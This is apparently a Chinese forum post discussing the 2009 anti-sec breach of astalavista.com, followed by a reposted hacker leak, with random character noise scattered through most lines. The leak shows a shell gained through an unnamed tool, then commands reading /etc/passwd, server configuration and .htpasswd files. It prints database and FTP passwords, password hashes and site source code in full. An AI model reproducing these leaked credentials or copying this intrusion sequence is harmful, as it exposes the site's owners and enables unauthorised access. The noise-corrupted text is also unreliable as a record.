里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。1 x8 | E9 O* d
& m3 k. R0 J/ h/ l! @[root@front3 ~]# curl -I litespeedtech.com
- t3 ] w9 v3 f% \ q ]" ?HTTP/1.1 200 OK
# i7 v+ }" E, }9 _8 PDate: Fri, 05 Jun 2009 22:54:51 GMT, W* x: N' r8 q) |& e3 y* S0 I
Server: LiteSpeed
2 y6 U: @$ N, o. Q. x- c: m5 [
# y3 f" C7 G# j另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-$ E2 P% g" b& }
8 f7 [* {! ]3 a* I. w
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
, @$ o% b) p, o- K+ m# d
! A6 @( G6 j* ^# F+ ?
$ A4 y( h4 }! X8 S K/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
; j& ^. K& e. M' U" W; v" ]/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
X. f# d7 ~3 V% W1 Y# J/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
) E! f6 U& e7 e8 O& S% Z\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /( n1 u5 c+ K+ u" p) d
\/ \/ \/ \/ \/ \/ \/0 L. l# `& n4 n4 C& g# Y
The Hacking & Security Community
! o0 O, ~% X2 E# I _; H- c[+] Founded in 1997 by a hacker computer enthusiast
) o" l/ ^" R; m) p) V w/ ?' R[-] Exposed in 2009 by anti-sec group
+ ]0 L1 @" x/ H6 V, Y1 D$ l& D; [" a* U9 S0 q4 ^4 w9 L5 `! O
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:( P, k' Q. b8 x$ S
>> 03. Who’s behind the site? X' h! J" B( k* W, _1 L9 K3 S
>>
1 @" S) F# m0 k- G>> A team of security and IT professionals, and a countless number of contributors from all over the world.
& B3 j3 D+ J$ x
8 l9 l& t4 T3 J. \* H+ r' n# _>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
& B8 @* Y- _1 K+ `% K+ q>>6 ~' ]2 O/ f4 }2 Q' q/ n8 X7 E
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and S7 v) I# A3 g
military institutions.; i. r; \% A- E+ I& \
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.' R5 R- s( n) h$ I
" T+ _8 [/ u% p5 t
Why has Astalavista been targeted?7 z9 \0 m7 m/ Q% d7 g/ z
. h* u3 X1 V' j4 p2 O( COther than the fact that they are not doing any of this for the “community” but6 L) B; {5 Z0 ], @! O+ U9 ] [
for the money, they spread exploits for kids, claim to be a security community" Z' [- w1 y3 h7 ]+ r
(with no real sense of security on their own servers), and they charge you $6.661 }5 i1 Y+ P1 P7 K& E7 v' o
per months to access a dead forum with a directory filled with public releases# G; s; [/ s) p2 d9 c9 D% M0 A# u
and outdated / broken services., O( r T7 u3 o& ?
! }5 d) ~; {3 s. W# f6 o+ s
We wanted to see how good that “team of security and IT professionals” really is.. |; n. @9 \3 z' `) w- l) O# J* h( o
$ O4 S1 a+ }6 ^+ l
Let’s begin.
8 H' j; S- x3 T9 [* z( {
+ c" ]* f/ t$ H3 j7 canti-sec:~# ./g0tshell astalavista.com -p 80, `' G% ?7 D3 }. l7 F& K
[+] Connecting to astalavista.com:803 a9 i9 v, K+ H/ h0 U
[+] Grabbing banner…
' ?: }0 V; z) T% r5 n: Q2 Z' oLiteSpeed2 [+ M2 @( O) F' s
[+] Injecting shellcode…
+ ?1 k" ]* R1 [+ }4 l[-] Wait for it8 p: R: o* P/ ?! t+ G
# W8 _4 X7 g, q M
[~] We g0tshell3 I. u R5 [' I% H' ^$ D
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux4 v8 U6 i4 e5 U/ \2 Z; ?
ID: uid=100(apache) gid=500(apache) groups=500(apache)
5 [" ^; \4 R7 l6 w h
% v1 Z$ b( j0 _# t' s" H7 ysh-3.2$ cat /etc/passwd
& Q0 X4 Q) e0 t6 groot:x:0:0:root:/root:/bin/bash
" M6 F3 u1 J. j' L0 z! j1 a$ obin:x:1:1:bin:/bin:/sbin/nologin
( ?" B9 s/ I9 l8 ?6 Mdaemon:x:2:2:daemon:/sbin:/sbin/nologin% F1 }! Q7 a3 c- @, n* g$ ^0 y
adm:x:3:4:adm:/var/adm:/sbin/nologin, }2 R" h3 y8 d
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
1 u6 L' O! U5 @( [+ i& |" O; M, y& Wsync:x:5:0:sync:/sbin:/bin/sync3 d/ x1 O1 j/ O6 r% K# a7 R( Q
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
4 M' C* o8 F; ]! q( u: fhalt:x:7:0:halt:/sbin:/sbin/halt
$ c0 C9 T( P* D0 ?9 Q5 U' hmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+ }3 j4 Y; d6 m* Hnews:x:9:13:news:/etc/news: j4 D" G% _) S/ K, P) B& [% T
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin+ z9 v5 K2 P, n* S( X
operator:x:11:0 perator:/root:/sbin/nologin7 X" V1 F4 F$ w+ F( y- {
games:x:12:100:games:/usr/games:/sbin/nologin
2 J o2 C. x# B8 ^0 v4 B1 Vgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
: D+ O: _, U9 f6 N8 Cftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
5 W* S0 ] z) t) _ g0 h" }nobody:x:99:99:Nobody:/:/sbin/nologin) B3 w6 e, V8 j0 v m- q
rpm:x:37:37::/var/lib/rpm:/sbin/nologin! Q3 I: M4 e7 h$ K3 n& Y. R+ ?) K
dbus:x:81:81:System message bus:/:/sbin/nologin U7 r6 m5 ^- |! S; X. Y8 _
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
, _. _& t4 }5 ymailnull:x:47:47::/var/spool/mqueue:/sbin/nologin) M0 L ]5 @2 d. k- n
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin+ H/ |# G6 B; t& T' c3 f! T3 }
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin& k! B3 ~. W/ f6 E; [( z
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin' S# O" ^/ E7 p8 O
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
: }/ R1 n' f) @, ^& [6 krpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
3 K& B8 O/ `; r( X+ A8 Infsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
+ S0 l7 j0 c! f' Hsshd:x:74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin F0 I4 l7 K; ^* y( Y, \0 P% `( d
pcap:x:77:77::/var/arpwatch:/sbin/nologin
! J @/ f5 U0 C/ Bnamed:x:25:25:Named:/var/named:/sbin/nologin
5 G- Q( e6 ?* h% q9 i; ~* N+ c6 _apache:x:100:500::/var/www:/bin/false
: E8 L) [5 ?5 I' J( X& r" kdiradmin:x:101:101::/usr/local/directadmin:/bin/bash* Q2 ^0 F* e; Z( Z5 |) H/ }& x
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash7 U; `. P4 x: \: T" y" `7 @& p
webapps:x:500:501::/var/www/html:/bin/bash
2 v" N n0 J0 b; M5 R' H/ T3 @majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
& v# x0 L* R( }$ ?2 S8 F3 ]6 Uadmin:x:501:502::/home/admin:/bin/bash
. {; F4 O- j; F7 N/ q3 o: H$ djon:x:502:503::/home/jon:/bin/bash* O# L- U* ^0 k; y3 Y x
com:x:503:504::/home/com:/bin/bash4 E, A+ r9 m# V6 n' B9 u
ntp:x:38:38::/etc/ntp:/sbin/nologin
' t6 S9 r, C1 h. D: X* Dais:x:39:39 penais Standards Based Cluster Framework:/:/sbin/nologin
6 L. q; Z& h S7 m5 U) ~( s6 ^astanet:x:504:505::/home/astanet:/bin/bash4 c a# X+ W: ]" _4 S* ^
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
- d8 a3 {- R1 c$ A% W! Zavahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
2 [' i3 R B/ q( i) c! N
Q, x! v+ r' tsh-3.2$ cat /etc/hosts; |, R' G8 G {1 c8 s: T
# Do not remove the following line, or various programs
" s- O' R* e5 r0 e/ k# that require network functionality will fail.1 K9 P: E& {: ~
127.0.0.1 localhost.localdomain localhost
# Q* w" o& o6 x: R a, M0 I::1 localhost6.localdomain6 localhost6
1 A) ~" j) G. `$ t3 A80.74.154.172 asta1.astalavistaserver.com
. | e/ G4 Q( X c$ A; u. T% w
U4 |0 P2 N0 o$ b2 `sh-3.2$ pwd# W2 n3 I g" U' @6 |4 @" M
/home/com/public_html
2 Z! m0 {; i t1 a; P4 \) h
$ x1 {% U: g% j; A4 Dsh-3.2$ ls -la. M' [! [# U* U) Q; d6 r W
total 18460
6 ^4 g8 M+ h( b# Vdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
$ o2 Q* Q4 _& {' s O' Ydrwx–x–x 11 com com 4096 Jun 25 2008 ..+ B5 m" L1 d5 e q
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin. E! T. h; r0 t
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache! R% B. k5 z! r
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin5 j0 ~% M; A! Q$ W" v7 @
drwxrwxrwx 2 com com 4096 May 19 00:50 config
0 _2 L: H! k$ r6 U0 `6 Udrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
3 X5 F9 v7 Q' s/ I& A! a) Q$ Udrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules3 B0 h' Z/ s0 o* n
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
& a/ l: T8 L, W( R0 |drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
4 v+ B6 r$ B0 {( zdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
9 J( z$ I+ L/ Z7 c4 s1 |2 r-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
- k# q7 Z; w' Y& [drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
+ v9 ^: u* G/ a/ Vdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
3 i I. e E$ {' \-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico5 `4 ?' o$ v2 }" h7 I* ?% V
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
7 C; ~( U0 L8 ?$ P! Q-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess, L1 x; h. O1 g2 y
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak+ l+ @7 l$ `% g: S7 v$ N
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak$ K6 A& v# r$ |( O/ F# j, Y
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
# j1 u! K. X1 hdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images- ?' Y, ~/ [5 k$ g( e/ R' A
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php' ?/ q; h8 P* A
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer' Y$ V' F0 }4 o2 R
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
( P0 o' d" D& ~3 i j5 ^drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
$ o6 E4 |! F/ h( E% n, P, Gdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
; B; ]6 z; h) {) zdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
4 u7 P9 U0 @& P Z- H* v9 |drwxr-xr-x 34 com com 4096 May 28 16:30 modules; W2 }+ d0 J- t( b% G- E
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
3 J# z k/ ~8 j9 rdrwxrwxr-x 22 com com 4096 May 28 17:06 _new5 o. h" ]5 r4 [" f5 [. H- W0 p
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old: ~5 z) x# G! j- }( F+ n
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
" O! F6 \( F( I. Q! Idrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
: d# o+ N3 P% S+ j4 e-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt9 r" V( q! b. r- g+ u i4 f
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
" [% r. g7 N. E8 D-rw-r–r– 1 com com 223 Mar 30 15:32 test.php0 x" U- f" b3 O" B) `1 _
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes6 c! t1 r/ \6 }& r0 o( c; e$ }, ?
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
! f" N, Y, k) n, ^, n. S7 hdrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
! u( n* e( Z" {6 d) B$ r; o7 Q
6 I4 \7 j% U5 E$ j0 I- C/ qsh-3.2$ head -20 index.php3 s+ ]: ]" A. \& W& _
<?php
( c/ Q1 i1 t5 @7 `
# E- H/ x9 h# U% k1 k, {. c/**
. _) W. a' h5 n! s* The main page for the CMS
& I. F' _& K7 `6 `* @copyright CONTREXX CMS - COMVATION AG
* F3 S" g6 |5 b6 S& p, a s* @author Comvation Development Team* @& ~' v9 t2 w' v
* @version v1.0.9.10.1 stable( F* d4 o! }4 p
* @package contrexx% N+ E4 `! X6 z) i$ B
* @subpackage core( N) C& R. ?, A( |8 y9 b
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage! C* r3 E: w9 [4 ^- G5 q9 M
* @since v0.0.0.0
/ H/ Y& T" O! n! I/ g d* @todo Capitalize all class names in project
S7 |# n1 p" Q9 Q8 n2 p3 | o+ h. |* @uses /config/configuration.php
9 j8 q$ O+ M# v+ m4 E* @uses /config/settings.php, v% f+ _: H: z' ]' j9 ?
* @uses /config/version.php. K9 \( k$ g' E( R7 |4 O. _( u s; M
* @uses /core/API.php
, y$ a$ y: Y/ C. R# o5 J* @uses /core_modules/cache/index.class.php
! w0 m" z% i! w$ t/ T3 L* @uses /core/error.class.php. l; z* U5 v+ q6 O# o
* @uses /core_modules/banner/index.class.php
5 W0 E5 W% M! t# G5 l8 m m) a# r* @uses /core_modules/contact/index.class.php
0 |; g+ M: d3 L2 Q9 {3 }* G' N+ l% H/ `2 x. I; a
sh-3.2$ cd config/
. l; t3 ^" u3 v3 G7 Hsh-3.2$ ls -la3 s8 R) u; ^( M2 y# ~: R4 k( w
total 32
( E) o3 x' K7 y! t2 P* V' bdrwxrwxrwx 2 com com 4096 May 19 00:50 .
4 H' P) A) j! k4 @: x9 b {) u4 Sdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..' K2 `% L) c9 K
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php! S* U8 o: g( E
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
4 t: S; T, \3 V, ?! u- e7 F" T8 f% {" s-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
+ f1 a/ f, |' G5 M6 M; V7 L: T* b/ o-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
" V/ S `5 y# g( D5 L
7 H' P. r! [! y2 M2 g3 n2 f# [7 _sh-3.2$ cat configuration.php
0 `) T% B- p2 d, G[snip]
4 o* c4 c% z0 n& D0 r6 O: Y$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
( w) I0 G% x! U1 n, w2 u$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name! G+ R2 Y5 C' d; G, L
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
3 E9 c( ~* V5 ?0 i) u* L. l$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
" `0 M: ^! U! O* Z$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
5 ?6 o. g, n9 b J. U0 r, T$ i) V$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)3 T) O" V$ w- I6 q8 I6 H, W" z
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..): P* _3 [& }, g9 C# W( _1 U( z6 W
[snip]
0 c3 g5 q, m1 l& I( b, z$_FTPCONFIG['is_activated'] = true; // Ftp support true or false. { s4 o# F+ L( G8 x8 d# L
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
( `! Y% j* v9 W+ X0 v! D9 m& i$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
' l n4 `6 H) L9 T9 T' ~2 i- g$_FTPCONFIG['port'] = 21; // Ftp remote port" o! B$ n( s: `
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
% G$ y' A' x7 P( S' ^9 c2 g$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password( F! ?) g5 m/ {' ^5 e$ q/ ?$ R
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms) N3 J4 V( {, V0 K Q
* R6 V" D5 h" ?
sh-3.2$ cd ..
* M5 c& o* V9 E& N8 K$ tsh-3.2$ cd dvd/
, C# q# b( W: t0 K( rsh-3.2$ ls -la
; r6 o* Z8 Q! j' W! n. ?total 2913780
2 x/ E( e/ @0 ~% t$ z4 j& Cdrwxr-xr-x 2 com com 4096 Sep 9 2008 .: ~. Y% H# W3 c, ^, x+ J) f" t* P
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..' G9 I' m) _# S& n
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
) T' u4 m# `1 J: p H* q5 V7 _-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
3 {' l4 s4 v8 x9 C" o. y5 K-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
% O( p2 S6 p- l-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
7 s( F {: V! b9 y4 u% N K7 U6 E: n( N0 L
sh-3.2$ cat .htaccess9 J" M$ {' |' I4 G# X$ N
authType Basic- W4 a6 b0 L4 ]" v$ |6 y% B* b
authName DVD
; p" ^& d/ r; l" }authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd, S, \' ]8 \3 e& K) l
require valid-user
7 D, \* _! w: S% g* d0 T: M# B" y& T9 c) i" n, J# L9 k
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd, J* Z2 X* }& K W% F% C w
DVDdownload:CRD8cuY6.MPT6, p5 z/ \% s1 o5 u X
DVDdownload2:CR8a36.wluFMg
* d7 p0 b& j! c: ~$ z
( e/ Q8 |! Y. Q2 J' B( Hsh-3.2$ cat test.php
9 o8 r7 V: e) N7 l% a: ]<?php" S) }# E* e- E$ f
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
9 o: y. |/ p) R% v; ?' ]$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));4 I; U% Z, c! h% G3 i
echo $url;
- Z- G; E' |0 Q: P1 F G?>. {/ R2 f f0 ~8 D5 g; B, [1 P
" k$ x: ]5 M) J4 f7 X- I
sh-3.2$ cd modifications/
9 U9 |3 `! z. [* Y, G! Ish-3.2$ ls -la$ M: n2 V$ r: ?$ R* ~: v$ @3 y8 U: s
total 32+ Y$ T8 R/ ]+ {8 f* ?' _1 e
drwxr-xr-x 8 com com 4096 May 11 12:48 .
_0 N! e" Y \) Idrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
_- r j! z% m% K% S- tdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
8 k! [2 M- e! E3 o, e& Z8 Hdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
. B# [, r; e0 ^( e* Ndrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
9 u9 T9 O: W8 v7 Bdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc1 n8 k# T. f; b" J3 [# S1 {
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
' B, [. M- g/ c% l- x2 Ydrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp" L1 S$ q$ L; Z6 E) ]8 L% w" a
( z% k$ n; q2 Y! N4 y! t' Gsh-3.2$ ls -R
6 q# Y( z* _. Y; D.:8 q3 L e( A7 a9 G( u& ^
com_avtng cronjobs onlinetools pjirc search _tmp6 W) H; s' z" @, T
; M! `& F+ q1 o) \' L0 T4 M./com_avtng:0 U& Z3 U3 i8 J
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
9 [. m; ?, v$ S! a. F
0 x: w+ M0 P& K! o1 t. R5 i& ]) E./com_avtng/scripts:
5 B2 k0 e/ u4 a; v T$ jpopunder.js
& x5 J( q1 E( E2 C& Y7 P9 k
+ G/ L# e+ {- D4 _./cronjobs:' R' I }9 c5 o
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
' Q2 T8 D: k }8 ~/ D- e5 y& z; R
5 k" z) }# z+ V# J1 M* o./cronjobs/tmp:
, ^* h3 b* h: ]% M' w7 Vcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
0 u: Q0 x; k6 x0 f' I' Q' S! M8 u l8 T
./onlinetools:
3 p7 ]8 u, ?4 `/ O( e, b4 xindex.php
/ T3 N2 ^' i A1 }& a- |
+ t m( N/ q* J k9 S$ {./pjirc:( w5 [; `7 D; I! ^/ l) V$ H8 e
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
4 b- e v9 M3 T7 ?AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
% D0 u8 q) m! p- I( Lbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
) \/ r- ?; V" t$ o( G- z* A
- d& w! _/ r( x./pjirc/img:) V/ ?$ S" f3 E4 y$ X( A0 q2 w
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif6 w+ }6 X! c5 g6 P
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
: e) E2 w2 X; Q/ X/ e& O8 `1 b8 qverre-eau.gif/ K8 T: O! C9 _! W1 t4 Q# ~- c, E
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif , @: |- K) r1 ~2 k- E! H, l8 I- P# O
verre-vin.gif
8 X1 C6 e8 z0 F2 V" eballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
% }9 m, M6 Q0 J( [5 Cbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
; U$ r& D) K! M/ m1 e
1 A1 Q( m( t" {# y0 a6 ]./pjirc/snd:
# |8 @0 @, ^: Y& Rbell2.au ding.au
; G+ s, _) k; g; k9 H0 M$ G0 i1 A6 }& P! h9 @4 L# [! `
./search:/ ^8 u' v& m( j# U$ a3 S
searchEngines.php search.php" d- N, M2 p7 L$ r7 O5 u
, |9 g* O' t( M! @$ c4 V
./_tmp:
- M+ u6 j7 [; ?0 _9 q7 u, bdefaultPorts.php defaultPorts.txt4 M2 G, q* |2 a3 H# f: P# \5 Q
9 f+ m3 p: |+ n; msh-3.2$ cd cronjobs/
9 F6 Z. @7 q& {7 d# L& {sh-3.2$ cat exploits.php
& g `$ K- I8 ]3 a) M1 M+ M( h[snip]
- {' x) i9 t# B# I$categories = array();
6 D" k) ?* V+ G+ \5 }1 i$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
* m2 C( y O: \6 y; \$expolits = file($milw0rmFile);
$ ^$ r# J. f+ T' G4 X+ f$comExploits = array();/ k1 w8 x8 _3 L+ S9 d+ y8 L
[snip]
, i/ v9 c8 [/ a4 w7 R- v// manage data
' J+ _& Z8 \: B H5 O2 z, Ffor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
1 |) \& H2 X! x# {/ V
4 L. }2 l3 ^+ \; ^2 h // get path and title
0 x- n) X' K8 s) S0 w6 I% H $expolits[$x] = trim($expolits[$x]);/ \7 H% g3 s% o# M4 }
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
6 j( F- Y1 a8 r) C $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
% e" m1 S$ H {0 U; Y& v6 C) U( y: U) [7 T2 H* Y- U
// check if file exists- v& c W/ u2 K: h
if (file_exists($path)) {) G2 q7 z3 U+ l& J. n8 B. _
- ~; J6 n0 }# y) L9 R" n
$text = file_get_contents($path);
+ m8 F. c9 M2 v! a) @
4 s+ g+ d5 j! l' C // get content and date3 c% X) X+ {* Q# n( T
//$text = htmlspecialchars($text, ENT_QUOTES);! k* ?" w% \' b S% B
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));- A# J# O- D4 B9 h4 n9 ?. _3 i9 I
if ($tmptext != ”) {" S! R" |* u. v+ `
$text = $tmptext;
$ |- P' X, a* B: {/ o% y+ w } else {
" y9 {! R/ V# ^9 l9 y+ b $text = addslashes(htmlentities($text, ENT_QUOTES));+ F; F3 e' {0 k8 t5 Z
}
2 N7 j1 n5 m- f& }2 r |4 P% E $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
' ^/ y/ a. p! ]1 @& l6 B6 J $tmp = explode('-', $date);1 e9 K: w; [4 V8 ?" q( E2 k4 v2 @
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
5 x* J/ V( K- S $cat = getCategory ($path);
1 s6 D9 O. { p( {4 T $ext = pathinfo(basename($path));( }+ p5 v0 N& }, l! p3 X
$ext = $ext['extension'];
0 |. O6 u! u) ?0 T. b6 M, W $qStr = ”, C2 a% |, S6 L
SELECT `id`
$ ^4 E5 X0 c/ _* P' ^8 b4 b/ k- @, ?) G FROM `contrexx_module_exploits`" }& E% }& n1 @. W. K! `3 `3 A3 U
WHERE `title` = ‘” . $title . “‘
" k6 I9 |- O3 X4 Y& j' M AND `date` = ‘” . $date . “‘
! ~- Z- a8 i0 P0 L6 B; ]- v8 M' y “;, Z& x+ j% s2 m( c- ?% I, V# X
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
2 D7 h/ ~' i; u, P. F, v $q = $_objDB->query($qStr);' L! n5 p1 V2 Z' R, R' S( W/ k* }
/ }; ?$ I! [5 C" f x% I2 a) @2 ]
if ($q->numRows() == 0) {
3 \( ]# Z8 T/ k. j
/ f- |6 p+ B" F. z* X' S( \5 P1 p // prepare array* d' w4 M- u* V) u6 q: A( o
$comExploits[$x]['date'] = $date;
: M3 R5 M9 m2 H1 n! L $comExploits[$x]['title'] = $title;4 C1 I5 a& [% D: V
$comExploits[$x]['author'] = ‘milw0rm’;" F- @2 {+ y: x; m2 a
$comExploits[$x]['text'] = $text;8 j9 j0 {* s+ y: l: T% W5 N' M
$comExploits[$x]['source'] = $ext;' l! ]& f$ u- [! }3 y3 K' }) U
$comExploits[$x]['url1'] = ”;) k' T6 _6 ~# C/ X; S p
$comExploits[$x]['url2'] = ”;/ [: }, C. Q) u! Q
$comExploits[$x]['catid'] = $cat;
- s8 j: O1 S+ b$ A# U! Z $comExploits[$x]['lang'] = ‘2′;1 j$ O4 R v+ T+ P- n
$comExploits[$x]['userid'] = ‘12′;
/ j3 o& k4 s' U, |8 a8 U2 K $comExploits[$x]['startdate'] = ‘0000-00-00′;7 p9 |0 _" h. r
$comExploits[$x]['enddate'] = ‘0000-00-00′;) n& R6 q; O9 ^# n3 q. e$ a/ J$ H
$comExploits[$x]['status'] = ‘1′;
0 d) f: S6 X& F& d! [ $comExploits[$x]['changelog'] = $date;
" A! n3 _# Y9 Y, H/ U% u/ e0 ?1 Y7 W+ P( t- M
}
5 e9 S+ h+ q% l/ a' A[snip]
1 b& }% ^1 i7 C7 I( n( [+ i" l $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
